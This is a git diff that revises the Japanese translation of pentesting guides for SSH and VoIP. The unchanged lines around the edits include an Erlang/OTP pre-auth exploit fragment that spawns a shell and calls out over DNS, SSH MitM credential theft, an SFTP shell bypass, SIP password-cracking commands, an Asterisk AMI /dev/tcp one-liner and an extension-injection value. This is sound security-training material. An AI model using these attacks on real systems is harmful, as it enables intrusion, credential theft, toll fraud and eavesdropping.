diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md
index 45f6acc20..7a4c716de 100644
--- a/src/network-services-pentesting/pentesting-ssh.md
+++ b/src/network-services-pentesting/pentesting-ssh.md
@@ -14,12 +14,12 @@
 
 - [openSSH](http://www.openssh.org) – OpenBSD SSH、BSD、LinuxディストリビューションおよびWindows 10以降のWindowsに搭載
 - [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) – 低メモリおよびプロセッサリソースの環境向けのSSH実装、OpenWrtに搭載
-- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) – Windows用のSSH実装、クライアントは一般的に使用されるが、サーバーの使用はまれ
+- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) – Windows用のSSH実装、クライアントは一般的に使用されるが、サーバーの使用は稀
 - [CopSSH](https://www.itefix.net/copssh) – Windows用のOpenSSH実装
 
 **SSHライブラリ(サーバーサイドの実装):**
 
-- [libssh](https://www.libssh.org) – SSHv2プロトコルを実装したマルチプラットフォームCライブラリ、[Python](https://github.com/ParallelSSH/ssh-python)、[Perl](https://github.com/garnier-quentin/perl-libssh/)および[R](https://github.com/ropensci/ssh)にバインディングがある; KDEのsftpやGitHubのgit SSHインフラストラクチャで使用されている
+- [libssh](https://www.libssh.org) – SSHv2プロトコルを実装するマルチプラットフォームCライブラリ、[Python](https://github.com/ParallelSSH/ssh-python)、[Perl](https://github.com/garnier-quentin/perl-libssh/)および[R](https://github.com/ropensci/ssh)にバインディングがある; KDEのsftpやGitHubのgit SSHインフラストラクチャで使用されている
 - [wolfSSH](https://www.wolfssl.com/products/wolfssh/) – ANSI Cで書かれたSSHv2サーバーライブラリ、組み込み、RTOS、およびリソース制約のある環境向け
 - [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) – Apache MINAに基づくApache SSHD Javaライブラリ
 - [paramiko](https://github.com/paramiko/paramiko) – Python SSHv2プロトコルライブラリ
@@ -32,7 +32,7 @@ nc -vn  22
 ```
 ### 自動化されたssh-audit
 
-ssh-auditは、sshサーバーおよびクライアントの設定監査ツールです。
+ssh-auditは、sshサーバーとクライアントの設定監査のためのツールです。
 
 [https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit)は、[https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)からの更新されたフォークです。
 
@@ -123,14 +123,14 @@ https://github.com/rapid7/ssh-badkeys/tree/master/authorized
 
 #### Weak SSH keys / Debian predictable PRNG
 
-一部のシステムには、暗号材料を生成するために使用されるランダムシードに既知の欠陥があります。これにより、劇的に減少したキー空間が生じ、ブルートフォース攻撃が可能になります。弱いPRNGの影響を受けたDebianシステムで生成された事前生成されたキーセットは、ここで入手できます: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)。
+一部のシステムには、暗号材料を生成するために使用されるランダムシードに既知の欠陥があります。これにより、ブルートフォース攻撃が可能な大幅に減少したキー空間が生じる可能性があります。弱いPRNGの影響を受けたDebianシステムで生成された事前生成されたキーセットは、ここで入手できます: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)。
 
-被害者のマシンの有効なキーを検索するには、ここを確認してください。
+被害者のマシンの有効なキーを検索するには、ここを確認する必要があります。
 
 ### Kerberos
 
-**crackmapexec** は `ssh` プロトコルを使用して、**kerberos経由で認証**するために `--kerberos` オプションを使用できます。\
-詳細については、`crackmapexec ssh --help` を実行してください。
+**crackmapexec**は、`ssh`プロトコルを使用して、**kerberos経由で認証**するために`--kerberos`オプションを使用できます。\
+詳細については、`crackmapexec ssh --help`を実行してください。
 
 ## Default Credentials
 
@@ -153,15 +153,15 @@ https://github.com/rapid7/ssh-badkeys/tree/master/authorized
 
 ## SSH-MitM
 
-もしあなたが被害者と同じローカルネットワークにいて、ユーザー名とパスワードを使用してSSHサーバーに接続しようとしている場合、**MitM攻撃を実行してその認証情報を盗むことができます:**
+もしあなたが被害者と同じローカルネットワークにいて、ユーザー名とパスワードを使用してSSHサーバーに接続しようとしている場合、**MitM攻撃を実行してその資格情報を盗むことができます:**
 
 **攻撃経路:**
 
 - **トラフィックのリダイレクト:** 攻撃者は被害者のトラフィックを自分のマシンに**転送**し、SSHサーバーへの接続試行を**傍受**します。
 - **傍受とログ記録:** 攻撃者のマシンは**プロキシ**として機能し、正当なSSHサーバーを装ってユーザーのログイン情報を**キャプチャ**します。
-- **コマンドの実行と中継:** 最後に、攻撃者のサーバーはユーザーの認証情報を**ログ記録**し、コマンドを実際のSSHサーバーに**転送**し、**実行**し、結果をユーザーに**返送**します。このプロセスはシームレスで正当なものに見えます。
+- **コマンドの実行と中継:** 最後に、攻撃者のサーバーはユーザーの資格情報を**ログ記録**し、**コマンドを**実際のSSHサーバーに**転送**し、**実行**し、**結果をユーザーに返します**。これにより、プロセスがシームレスで正当なものに見えます。
 
-[**SSH MITM**](https://github.com/jtesta/ssh-mitm) は、上記の説明通りのことを実行します。
+[**SSH MITM**](https://github.com/jtesta/ssh-mitm)は、上記の説明通りに動作します。
 
 実際のMitMをキャプチャするためには、ARPスプーフィング、DNSスプーフィング、または[**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing)で説明されている他の技術を使用できます。
 
@@ -169,7 +169,7 @@ https://github.com/rapid7/ssh-badkeys/tree/master/authorized
 
 発見されたSSHプライベートキーを使用してネットワークを横断し、各システムの各プライベートキーを新しいホストに利用する場合、[**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake)が必要です。
 
-SSH-Snakeは以下のタスクを自動的かつ再帰的に実行します:
+SSH-Snakeは、以下のタスクを自動的かつ再帰的に実行します:
 
 1. 現在のシステムで、任意のSSHプライベートキーを見つける。
 2. 現在のシステムで、プライベートキーが受け入れられる可能性のあるホストまたは宛先(user@host)を見つける。
@@ -182,14 +182,14 @@ SSH-Snakeは以下のタスクを自動的かつ再帰的に実行します:
 
 ### Root login
 
-SSHサーバーがデフォルトでrootユーザーのログインを許可することは一般的であり、これは重大なセキュリティリスクをもたらします。**rootログインを無効にする**ことは、サーバーを保護するための重要なステップです。この変更を行うことで、管理者権限を持つ不正アクセスやブルートフォース攻撃を軽減できます。
+SSHサーバーがデフォルトでrootユーザーのログインを許可することは一般的であり、これは重大なセキュリティリスクをもたらします。**rootログインを無効にすること**は、サーバーを保護するための重要なステップです。この変更を行うことで、管理者権限を持つ不正アクセスやブルートフォース攻撃を軽減できます。
 
 **OpenSSHでRoot Loginを無効にする方法:**
 
-1. `sudoedit /etc/ssh/sshd_config` でSSH設定ファイルを**編集**します。
-2. `#PermitRootLogin yes` の設定を **`PermitRootLogin no`** に**変更**します。
-3. `sudo systemctl daemon-reload` を使用して**設定を再読み込み**します。
-4. 変更を適用するためにSSHサーバーを**再起動**します: `sudo systemctl restart sshd`
+1. `sudoedit /etc/ssh/sshd_config`でSSH設定ファイルを編集します。
+2. 設定を`#PermitRootLogin yes`から**`PermitRootLogin no`**に変更します。
+3. `sudo systemctl daemon-reload`を使用して設定を再読み込みします。
+4. 変更を適用するためにSSHサーバーを再起動します: `sudo systemctl restart sshd`
 
 ### SFTP Brute Force
 
@@ -197,7 +197,7 @@ SSHサーバーがデフォルトでrootユーザーのログインを許可す
 
 ### SFTP command execution
 
-SFTPセットアップにおいて一般的な見落としが発生します。管理者はユーザーがリモートシェルアクセスを有効にせずにファイルを交換できるように意図しています。ユーザーを非対話型シェル(例: `/usr/bin/nologin`)に設定し、特定のディレクトリに制限しても、セキュリティの抜け穴が残ります。**ユーザーはログイン後すぐにコマンド(例: `/bin/bash`)の実行を要求することで、これらの制限を回避できます**。これにより、不正なコマンド実行が可能になり、意図されたセキュリティ対策が損なわれます。
+SFTPセットアップでは、管理者がユーザーにリモートシェルアクセスを有効にせずにファイルを交換させることを意図している場合に一般的な見落としが発生します。ユーザーを非対話型シェル(例:`/usr/bin/nologin`)に設定し、特定のディレクトリに制限しても、セキュリティの抜け穴が残ります。**ユーザーは、指定された非対話型シェルが引き継ぐ前に、ログイン後にコマンド(例:`/bin/bash`)の実行を要求することで、これらの制限を回避できます**。これにより、不正なコマンド実行が可能になり、意図されたセキュリティ対策が損なわれます。
 
 [こちらからの例](https://community.turgensec.com/ssh-hacking-guide/):
 ```bash
@@ -232,7 +232,7 @@ PermitTunnel no
 X11Forwarding no
 PermitTTY no
 ```
-この設定では、SFTPのみを許可します:開始コマンドを強制することでシェルアクセスを無効にし、TTYアクセスを無効にするだけでなく、すべての種類のポートフォワーディングやトンネリングも無効にします。
+この設定では、SFTPのみを許可します:開始コマンドを強制することでシェルアクセスを無効にし、TTYアクセスも無効にし、すべての種類のポートフォワーディングやトンネリングも無効にします。
 
 ### SFTPトンネリング
 
@@ -242,9 +242,9 @@ sudo ssh -L :: -N -f @ symlink / froot
 ```
@@ -252,7 +252,7 @@ sftp> symlink / froot
 
 ### 認証方法
 
-高セキュリティ環境では、単純なパスワードベースの認証の代わりに、キーベースまたは二要素認証のみを有効にすることが一般的な慣行です。しかし、しばしば強力な認証方法が有効になっていても、弱い方法が無効になっていないことがあります。よくあるケースは、openSSHの設定で `publickey` を有効にし、デフォルトの方法として設定するが、`password` を無効にしないことです。そのため、SSHクライアントの詳細モードを使用することで、攻撃者は弱い方法が有効になっていることを見ることができます。
+高セキュリティ環境では、単純なパスワードベースの認証の代わりに、キーベースまたは二要素認証のみを有効にすることが一般的な慣行です。しかし、しばしば強力な認証方法が有効になっていても、弱い方法が無効になっていないことがあります。よくあるケースは、openSSHの設定で `publickey` を有効にし、デフォルトの方法として設定するが、`password` を無効にしないことです。そのため、SSHクライアントの詳細モードを使用することで、攻撃者は弱い方法が有効になっていることを確認できます。
 ```bash
 ssh -v 192.168.1.94
 OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
@@ -265,9 +265,9 @@ ssh -v 192.168.1.94 -o PreferredAuthentications=password
 ...
 debug1: Next authentication method: password
 ```
-SSHサーバーの設定を確認することは、予期される方法のみが承認されていることを確認するために必要です。クライアントで詳細モードを使用すると、設定の効果を確認するのに役立ちます。
+SSHサーバーの設定を確認することは、予期される方法のみが許可されていることを確認するために必要です。クライアントで詳細モードを使用すると、設定の効果を確認するのに役立ちます。
 
-### Config files
+### 設定ファイル
 ```bash
 ssh_config
 sshd_config
@@ -287,7 +287,7 @@ id_rsa
 
 プロトコルレベルでは、_メッセージコード_ **≥ 80** (0x50) の任意のSSHメッセージは*接続*レイヤー (RFC 4254) に属し、**成功した認証の後のみ受け入れられるべきです** (RFC 4252)。 サーバーが*SSH_AUTHENTICATION*状態のままこれらのメッセージの1つを処理すると、攻撃者はすぐにチャネルを作成し、コマンド実行、ポートフォワーディングなどのアクションを要求できます。
 
-### 一般的なエクスプロイト手順
+### 一般的な悪用手順
 1. ターゲットのSSHポート(一般的には22ですが、他のサービスは2022、830、2222などでErlang/OTPを公開している場合があります)にTCP接続を確立します。
 2. 生のSSHパケットを作成します:
 * 4バイトの**packet_length**(ビッグエンディアン)
@@ -326,15 +326,17 @@ execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid,
 execSinet:gethostbyname(".dns.outbound.watchtowr.com").Zsession
 ```
 検出と緩和:
-* SSHトラフィックを検査: **認証前に観測されたメッセージコードが≥ 80のパケットはすべてドロップする**。
+* SSHトラフィックを検査する: **認証前に観測されたメッセージコードが≥ 80のパケットはすべてドロップする**。
 * Erlang/OTPを**27.3.3 / 26.2.5.11 / 25.3.2.20**以上にアップグレードする。
-* 管理ポート(22/2022/830/2222)の露出を制限する – 特にOT機器において。
+* 管理ポート(22/2022/830/2222)の露出を制限する - 特にOT機器において。
 
 ---
 ### 影響を受ける他の実装
-* **libssh** 0.6 – 0.8(サーバー側) – **CVE-2018-10933** – クライアントによって送信された認証されていない`SSH_MSG_USERAUTH_SUCCESS`を受け入れ、実質的に逆の論理欠陥。
+* **libssh** 0.6 – 0.8(サーバー側) – **CVE-2018-10933** – クライアントによって送信された認証されていない`SSH_MSG_USERAUTH_SUCCESS`を受け入れ、実質的に逆の論理欠陥を持つ。
+
+共通の教訓は、RFCで定められた状態遷移からの逸脱は致命的である可能性があるということです。SSHデーモンをレビューまたはファジングする際は、*状態マシンの強制*に特に注意を払ってください。
+
 
-一般的な教訓は、RFCで定められた状態遷移からの逸脱は致命的である可能性があるということです。SSHデーモンをレビューまたはファジングする際は、*状態マシンの強制*に特に注意を払ってください。
 
 ## 参考文献
 
diff --git a/src/network-services-pentesting/pentesting-voip/README.md b/src/network-services-pentesting/pentesting-voip/README.md
index a0798ffb0..1e322354f 100644
--- a/src/network-services-pentesting/pentesting-voip/README.md
+++ b/src/network-services-pentesting/pentesting-voip/README.md
@@ -3,9 +3,10 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
-## VoIPの基本情報
+## VoIP 基本情報
+
+VoIP の仕組みを学び始めるには、以下を確認してください:
 
-VoIPの仕組みについて学ぶには、以下を確認してください:
 
 {{#ref}}
 basic-voip-protocols/
@@ -182,12 +183,12 @@ VoIPソフトウェアを特定するのに役立つ他のOSINT列挙は、Red T
 
 ### ネットワーク列挙
 
-- **`nmap`** はUDPサービスのスキャンが可能ですが、スキャンされるUDPサービスの数が多いため、非常に遅く、この種のサービスに対してあまり正確ではないかもしれません。
+- **`nmap`** はUDPサービスのスキャンが可能ですが、スキャンされるUDPサービスの数が多いため、非常に遅く、この種のサービスに対してあまり正確ではない可能性があります。
 ```bash
 sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
 ```
 - **`svmap`** from SIPVicious (`sudo apt install sipvicious`): 指定されたネットワーク内のSIPサービスを特定します。
-- `svmap`は**ブロックしやすい**です。なぜなら、User-Agent `friendly-scanner`を使用しているからですが、`/usr/share/sipvicious/sipvicious`のコードを修正して変更することができます。
+- `svmap`は**簡単にブロック**されます。なぜなら、User-Agent `friendly-scanner`を使用するからですが、`/usr/share/sipvicious/sipvicious`のコードを修正して変更することができます。
 ```bash
 # Use --fp to fingerprint the services
 svmap 10.10.0.0/24 -p 5060-5070 [--fp]
@@ -210,7 +211,7 @@ auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)
 ```
 #### 追加のネットワーク列挙
 
-PBXは、次のような他のネットワークサービスも公開している可能性があります:
+PBXは、次のような他のネットワークサービスを公開している可能性があります:
 
 - **69/UDP (TFTP)**: ファームウェアの更新
 - **80 (HTTP) / 443 (HTTPS)**: ウェブからデバイスを管理するため
@@ -218,6 +219,7 @@ PBXは、次のような他のネットワークサービスも公開してい
 - **3306 (MySQL)**: MySQLデータベース
 - **5038 (Manager)**: 他のプラットフォームからAsteriskを使用することを許可
 - **5222 (XMPP)**: Jabberを使用したメッセージ
+- **5432 (PostgreSQL)**: PostgreSQLデータベース
 - その他...
 
 ### メソッド列挙
@@ -238,9 +240,9 @@ sippts wssend -i 10.10.0.10 -r 443 -path /ws
 ```
 ### 拡張子の列挙
 
-PBX(プライベート・ブランチ・エクスチェンジ)システムにおける拡張子は、**組織やビジネス内の個々の**電話回線、デバイス、またはユーザーに割り当てられた**ユニークな内部識別子**を指します。拡張子は、**各ユーザーやデバイスのために個別の外部電話番号を必要とせずに、組織内での通話を効率的にルーティングする**ことを可能にします。
+PBX(プライベート・ブランチ・エクスチェンジ)システムにおける拡張子は、組織やビジネス内の個々の電話回線、デバイス、またはユーザーに割り当てられた**ユニークな内部識別子**を指します。拡張子は、**組織内での通話を効率的にルーティングする**ことを可能にし、各ユーザーやデバイスに対して個別の外部電話番号を必要としません。
 
-- **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar`は無料のSIP PBX拡張ラインスキャナーです。概念的には、**拡張子の範囲や指定された拡張子のリストを推測することによって、従来のウォードライラーと同様に機能します**。
+- **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar`は無料のSIP PBX拡張ラインスキャナーです。概念的には、**拡張子の範囲や指定された拡張子のリストを推測する**ことによって、従来のウォードライラーと似たように機能します。
 ```bash
 svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
 ```
@@ -262,7 +264,7 @@ enumiax -v -m3 -M3 10.10.0.10
 
 ### パスワードブルートフォース - オンライン
 
-**PBX**といくつかの**拡張/ユーザー名**を発見した場合、Red Teamは一般的なパスワードの辞書を使用して**`REGISTER`メソッド**を介して拡張に認証を試みることができます。
+**PBX**といくつかの**拡張/ユーザー名**を発見した場合、Red Teamは一般的なパスワードの辞書を使用して、拡張に対して**`REGISTER`メソッド**を介して**認証を試みる**ことができます。
 
 > [!CAUTION]
 > **ユーザー名**は拡張と同じである可能性がありますが、この慣行はPBXシステム、その設定、および組織の好みによって異なる場合があります...
@@ -274,7 +276,7 @@ enumiax -v -m3 -M3 10.10.0.10
 svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
 svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
 ```
-- **`SIPPTS rcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rcrackは、SIPサービス用のリモートパスワードクラッカーです。Rcrackは、異なるIPおよびポート範囲で複数のユーザーのパスワードをテストできます。
+- **`SIPPTS rcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rcrackは、SIPサービス用のリモートパスワードクラッカーです。Rcrackは、異なるIPおよびポート範囲の複数のユーザーのパスワードをテストできます。
 ```bash
 sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
 ```
@@ -282,9 +284,9 @@ sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
 - [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
 - [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb)
 
-### VoIP スニッフィング
+### VoIP Sniffing
 
-**オープンWifiネットワーク**内にVoIP機器を見つけた場合、**すべての情報をスニッフィング**することができます。さらに、より閉じたネットワーク(Ethernet経由または保護されたWifiに接続)内にいる場合、**PBXとゲートウェイ**の間で**MitM攻撃**(例えば、[**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing))を実行して情報をスニッフィングすることができます。
+**Open Wifiネットワーク**内にVoIP機器を見つけた場合、**すべての情報をスニッフィング**することができます。さらに、より閉じたネットワーク(Ethernet経由または保護されたWifiに接続)内にいる場合、**PBXとゲートウェイ**の間で**MitM攻撃**(例えば、[**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing))を実行して情報をスニッフィングすることができます。
 
 ネットワーク情報の中には、機器を管理するための**ウェブ認証情報**、ユーザーの**内線番号**、**ユーザー名**、**IP**アドレス、さらには**ハッシュ化されたパスワード**や**RTPパケット**が含まれており、これを再生して**会話を聞く**ことができます。
 
@@ -294,7 +296,7 @@ sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
 > **SIP通信でTLSが使用されている**場合、SIP通信をクリアで見ることはできません。\
 > **SRTP**や**ZRTP**が使用されている場合も同様で、**RTPパケットはクリアテキストではありません**。
 
-#### SIP 認証情報(パスワードブルートフォース - オフライン)
+#### SIP credentials (Password Brute-Force - offline)
 
 [**SIP REGISTER通信**をよりよく理解するためのこの例を確認してください](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) **認証情報がどのように送信されるか**を学ぶために。
 
@@ -315,29 +317,29 @@ sippts dcrack -f data.txt -w wordlist/rockyou.txt
 ```bash
 sippts tshark -f capture.pcap [-filter auth]
 ```
-#### DTMF コード
+#### DTMFコード
 
-**SIP 認証情報**だけでなく、**ボイスメール**にアクセスするために使用される DTMF コードもネットワークトラフィック内で見つけることができます。\
-これらのコードは **INFO SIP メッセージ**、**音声**、または **RTP パケット**内で送信することが可能です。コードが RTP パケット内にある場合、その会話の部分を切り取り、ツール multimo を使用して抽出することができます:
+**SIP認証情報**だけでなく、ネットワークトラフィック内で**ボイスメール**にアクセスするために使用されるDTMFコードを見つけることも可能です。\
+これらのコードは**INFO SIPメッセージ**、**音声**、または**RTPパケット**内で送信することができます。コードがRTPパケット内にある場合、その会話の部分を切り取り、ツールmultimoを使用して抽出することができます:
 ```bash
 multimon -a DTMF -t wac pin.wav
 ```
 ### 無料通話 / Asterisk接続の誤設定
 
-Asteriskでは、**特定のIPアドレス**からの接続を許可することも、**任意のIPアドレス**からの接続を許可することも可能です:
+Asteriskでは、**特定のIPアドレス**からの接続を許可することも、**任意のIPアドレス**からの接続を許可することも可能です:
 ```
 host=10.10.10.10
 host=dynamic
 ```
-指定されたIPアドレスがある場合、ホストは**REGISTER**リクエストを定期的に送信する必要がなくなります(REGISTERパケットには通常30分の有効期限が含まれており、他のシナリオでは電話は30分ごとにREGISTERする必要があります)。ただし、VoIPサーバーからの接続を受け入れるためにオープンポートが必要です。
+IPアドレスが指定されている場合、ホストは**REGISTER**リクエストを定期的に送信する必要がなくなります(REGISTERパケットには通常30分の有効期限が含まれており、他のシナリオでは電話が30分ごとにREGISTERする必要があります)。ただし、VoIPサーバーからの接続を受け入れるためにオープンポートが必要です。
 
 ユーザーを定義するには、次のように定義できます:
 
-- **`type=user`**: ユーザーはユーザーとしてのみ通話を受けることができます。
-- **`type=friend`**: ピアとして通話を行い、ユーザーとして受けることが可能です(拡張機能と共に使用)。
-- **`type=peer`**: ピアとして通話を送受信することが可能です(SIPトランク)。
+- **`type=user`**: ユーザーとしてのみ通話を受けることができます。
+- **`type=friend`**: ピアとして通話を行い、ユーザーとして受けることができます(拡張機能と共に使用)。
+- **`type=peer`**: ピアとして通話を送受信できます(SIPトランク)。
 
-信頼を確立するために、不正確な変数を使用することも可能です:
+信頼を確立するために、次の不正確な変数を使用することも可能です:
 
 - **`insecure=port`**: IPによって検証されたピア接続を許可します。
 - **`insecure=invite`**: INVITEメッセージの認証を必要としません。
@@ -353,13 +355,13 @@ host=dynamic
 
 ### 無料通話 / Asteriskコンテキストの誤設定
 
-Asteriskにおいて、**コンテキスト**はダイヤルプラン内の関連する拡張機能、アクション、およびルールを**グループ化する**名前付きコンテナまたはセクションです。ダイヤルプランはAsteriskシステムのコアコンポーネントであり、**着信および発信通話がどのように処理され、ルーティングされるかを定義します**。コンテキストはダイヤルプランを整理し、アクセス制御を管理し、システムの異なる部分間の分離を提供するために使用されます。
+Asteriskにおいて、**コンテキスト**はダイヤルプラン内の関連する拡張機能、アクション、ルールを**グループ化する**名前付きコンテナまたはセクションです。ダイヤルプランはAsteriskシステムのコアコンポーネントであり、**着信および発信通話がどのように処理され、ルーティングされるかを定義します**。コンテキストはダイヤルプランを整理し、アクセス制御を管理し、システムの異なる部分間の分離を提供するために使用されます。
 
 各コンテキストは設定ファイル、通常は**`extensions.conf`**ファイルで定義されます。コンテキストは角括弧で示され、その中にコンテキスト名が含まれます。例えば:
 ```bash
 csharpCopy code[my_context]
 ```
-コンテキスト内では、拡張機能(ダイヤルされた番号のパターン)を定義し、それを一連のアクションやアプリケーションに関連付けます。これらのアクションは、通話がどのように処理されるかを決定します。例えば:
+コンテキスト内では、拡張子(ダイヤルされた番号のパターン)を定義し、それを一連のアクションやアプリケーションに関連付けます。これらのアクションは、通話がどのように処理されるかを決定します。例えば:
 ```scss
 [my_context]
 exten => 100,1,Answer()
@@ -395,19 +397,19 @@ sippts invite -i  10.10.0.10 -fu 200 -tu 555555555 -v
 # Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
 sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444
 ```
-### 無料通話 / 誤設定されたIVRS
+### 無料通話 / 設定ミスのIVRS
 
 IVRSは**インタラクティブ音声応答システム**の略で、ユーザーが音声またはトーン入力を通じてコンピュータ化されたシステムと対話することを可能にする電話技術です。IVRSは、情報提供、通話のルーティング、ユーザー入力のキャプチャなど、さまざまな機能を提供する**自動通話処理**システムを構築するために使用されます。
 
 VoIPシステムにおけるIVRSは通常、以下で構成されています:
 
-1. **音声プロンプト**:ユーザーをIVRメニューオプションや指示に導く事前録音された音声メッセージ。
+1. **音声プロンプト**:ユーザーをIVRメニューオプションや指示に導くための事前録音された音声メッセージ。
 2. **DTMF**(デュアルトーン多周波数)信号:電話のキーを押すことで生成されるトーン入力で、IVRメニューをナビゲートし、入力を提供するために使用されます。
 3. **通話ルーティング**:ユーザー入力に基づいて、特定の部門、エージェント、または内線など、適切な宛先に通話を直接送信します。
-4. **ユーザー入力のキャプチャ**:呼び出し者からの情報を収集します。例えば、アカウント番号、ケースID、またはその他の関連データなどです。
-5. **外部システムとの統合**:IVRシステムをデータベースや他のソフトウェアシステムに接続し、情報にアクセスまたは更新し、アクションを実行したり、イベントをトリガーしたりします。
+4. **ユーザー入力のキャプチャ**:呼び出し者からの情報を収集します。たとえば、アカウント番号、ケースID、またはその他の関連データなどです。
+5. **外部システムとの統合**:IVRシステムをデータベースや他のソフトウェアシステムに接続して、情報にアクセスまたは更新し、アクションを実行したり、イベントをトリガーしたりします。
 
-Asterisk VoIPシステムでは、ダイヤルプラン(**`extensions.conf`**ファイル)を使用してIVRを作成し、`Background()`、`Playback()`、`Read()`などのさまざまなアプリケーションを使用できます。これらのアプリケーションは、音声プロンプトを再生し、ユーザー入力をキャプチャし、通話の流れを制御するのに役立ちます。
+Asterisk VoIPシステムでは、ダイヤルプラン(**`extensions.conf`**ファイル)と`Background()`、`Playback()`、`Read()`などのさまざまなアプリケーションを使用してIVRを作成できます。これらのアプリケーションは、音声プロンプトを再生し、ユーザー入力をキャプチャし、通話の流れを制御するのに役立ちます。
 
 #### 脆弱な設定の例
 ```scss
@@ -420,17 +422,17 @@ exten => 0,104,Dial(LOCAL/${numbers})
 前の例では、ユーザーに**1を押して**部門に電話するように、**2を押して**別の部門に電話するように、または知っている場合は**完全な内線番号**を入力するように求められます。\
 脆弱性は、指定された**内線番号の長さがチェックされない**ため、ユーザーが5秒のタイムアウトを持つ完全な番号を入力すると、それが呼び出される可能性があることです。
 
-### Extension Injection
+### 内線番号インジェクション
 
-次のような内線を使用して:
+内線番号を使用して:
 ```scss
 exten => _X.,1,Dial(SIP/${EXTEN})
 ```
-**`${EXTEN}`** は **呼び出される内線番号** であり、**ext 101 が導入されると**、次のようなことが起こります:
+**`${EXTEN}`** は **呼び出される拡張子** であり、**ext 101 が導入されると** これが起こります:
 ```scss
 exten => 101,1,Dial(SIP/101)
 ```
-しかし、もし **`${EXTEN}`** が **数字以外のもの**(古いAsteriskバージョンのように)を入力することを許可する場合、攻撃者は **`101&SIP123123123`** を入力して電話番号123123123に電話をかけることができます。そして、これが結果になります:
+しかし、もし **`${EXTEN}`** が **数字以外のもの**(古いAsteriskバージョンのように)を受け入れる場合、攻撃者は **`101&SIP123123123`** を入力して電話番号123123123に電話をかけることができます。そして、これが結果になります:
 ```scss
 exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
 ```
@@ -438,14 +440,14 @@ exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
 
 ## SIPDigestLeak 脆弱性
 
-SIP Digest Leakは、多くのSIP電話、ハードウェアおよびソフトウェアのIP電話、電話アダプタ(VoIPからアナログ)に影響を与える脆弱性です。この脆弱性は、**パスワードから計算されたDigest認証応答の漏洩**を可能にします。**オフラインパスワード攻撃が可能**であり、チャレンジ応答に基づいてほとんどのパスワードを回復できます。
+SIP Digest Leakは、多くのSIP電話、ハードウェアおよびソフトウェアのIP電話、電話アダプタ(VoIPからアナログ)に影響を与える脆弱性です。この脆弱性は、パスワードから計算される**Digest認証応答の漏洩**を可能にします。これにより、**オフラインパスワード攻撃が可能**となり、チャレンジ応答に基づいてほとんどのパスワードを回復できます。
 
 **[脆弱性シナリオはこちらから**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):
 
 1. IP電話(被害者)は任意のポート(例:5060)で電話を受け付けています
 2. 攻撃者はIP電話にINVITEを送信します
 3. 被害者の電話が鳴り、誰かが電話を取り、すぐに切ります(相手が電話に出ないため)
-4. 電話が切られると、**被害者の電話は攻撃者にBYEを送信します**
+4. 電話が切れると、**被害者の電話は攻撃者にBYEを送信します**
 5. **攻撃者は407応答を発行し**、**認証を要求し**、認証チャレンジを発行します
 6. **被害者の電話は2回目のBYEで認証チャレンジに対する応答を提供します**
 7. **攻撃者はローカルマシン(または分散ネットワークなど)でチャレンジ応答に対してブルートフォース攻撃を実行し**、パスワードを推測できます
@@ -486,9 +488,9 @@ read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
 write = system,call,agent,user,config,command,reporting,originate
 ```
 - 前のプロファイルは**任意のIPアドレスが接続することを許可しています**(パスワードが知られている場合)。
-- **通話を組織するためには**、前述のように、**読み取り権限は必要ありません**、**必要なのは** **書き込み**の**発信**のみです。
+- **通話を組織するためには**、前述のように、**読み取り権限は必要ありません**、そして**書き込み**で**発信**するだけで十分です。
 
-これらの権限があれば、パスワードを知っている任意のIPが接続し、次のような過剰な情報を抽出することができます:
+これらの権限があれば、パスワードを知っている任意のIPが接続し、以下のような過剰な情報を抽出することができます:
 ```bash
 # Get all the peers
 exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
@@ -497,13 +499,13 @@ exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecr
 
 ### **盗聴**
 
-Asteriskでは、**`ChanSpy`** コマンドを使用して、**監視する内線番号**(またはすべて)を指定することで、行われている会話を聞くことができます。このコマンドは内線番号に割り当てる必要があります。
